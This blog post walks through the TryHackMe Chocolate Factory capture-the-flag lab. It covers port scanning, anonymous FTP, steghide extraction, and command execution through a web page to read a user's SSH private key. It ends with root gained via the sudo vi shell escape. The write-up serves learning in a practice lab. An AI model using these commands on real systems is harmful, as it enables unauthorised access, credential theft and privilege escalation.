Post

TryHackMe Chocolate Factory WriteUp

Posted Updated
By Obaidah Salameh 2 min read

TryHackMe Chocolate Factory WriteUp

Hello and Welcome to my first writeup!

Reconnaissance and Enumeration

first we scan the machine using nmap using the command:

1

nmap -sV [IP HERE]

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

21/tcp  open  ftp        vsftpd 3.0.3

22/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp  open  http       Apache httpd 2.4.29 ((Ubuntu))

100/tcp open  newacct?

106/tcp open  pop3pw?

109/tcp open  pop2?

110/tcp open  pop3?

111/tcp open  rpcbind?

113/tcp open  ident?

119/tcp open  nntp?

125/tcp open  locus-map?

ftp enumeration

we login to ftp using username: “anonymous” and password: “anonymous”

in ftp found “gum_room.jpg”

used steghide to extract it:

1

steghide extract -sf gum_room.jpg

didnt put passphrase, b64.txt extracterd.

found what looks like a /etc/shadow file. didnt find anything usefull.

web enumeration

we open the webpage and find a login portal.

i used gobuster to enumrate directories.

1
2
3
4
5
6
7
8
9
10
11

"gobuster dir -u http://[IP HERE] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html"

gobuster: the name of the tool.
 
dir: specify we want to bruteforce directiories.

-u: specify the url

-w: specify the world list

-x: look for filees with exstinsions.

result:

1
2
3
4
5
6
7
8
9

/.php                 (Status: 403) [Size: 278]

/.html                (Status: 403) [Size: 278]

/index.html           (Status: 200) [Size: 1466]

/home.php             (Status: 200) [Size: 569]

/validate.php         (Status: 200) [Size: 93]

Initial Access:

we navigat to home.php, you can run commands in it.

image

we try the whoami command

image

it works! we search for users in the home directory using “ls /home”

image

found user charlie, we list the files, using “ls /home/charlie”

image

1

"cat /home/charlie/teleport"

Bingo! found ssh private key.

image

i copied it into id_rsa file then give it the right permissions using chmod +600 test if we can login using ssh to the user. the key works!

image

in /var/www/html i found a file named key_rev_key, i try to run it:

image

changed the permissions using chmod +x key_rev_key

image

since its a binary, we can check the file contents using strings key_rev_key

image

got the key!

b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='

in /var/www/html we cat validate.php:

image

run validate.php , bingo we got charlies password :)

login to charlies account using “su charlie”.

user.txt

image

Privilege Escalation:

The first thing you should check for is sudo -l, result:

1
2
3
4
5
6
7
8

Matching Defaults entries for charlie on chocolate-factory:
   env_reset, mail_badpass,
   
   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    
   (ALL : !root) NOPASSWD: /usr/bin/vi

in gtfobins, vi -c ':!/bin/sh' /dev/null

i ran it with sudo so if it works we could get root privileges sudo vi -c ':!/bin/sh' /dev/null

1

charlie@chocolate-factory:/home/charlie$ sudo vi -c ':!/bin/sh' /dev/null

pwned!!

Finding the root flag

we find root.py we run it , enter the key we obtained before , and it shows us the root flag.

image(1)

Happy Pwning :)

writeups
thm boxes
This post is licensed under CC BY 4.0 by the author.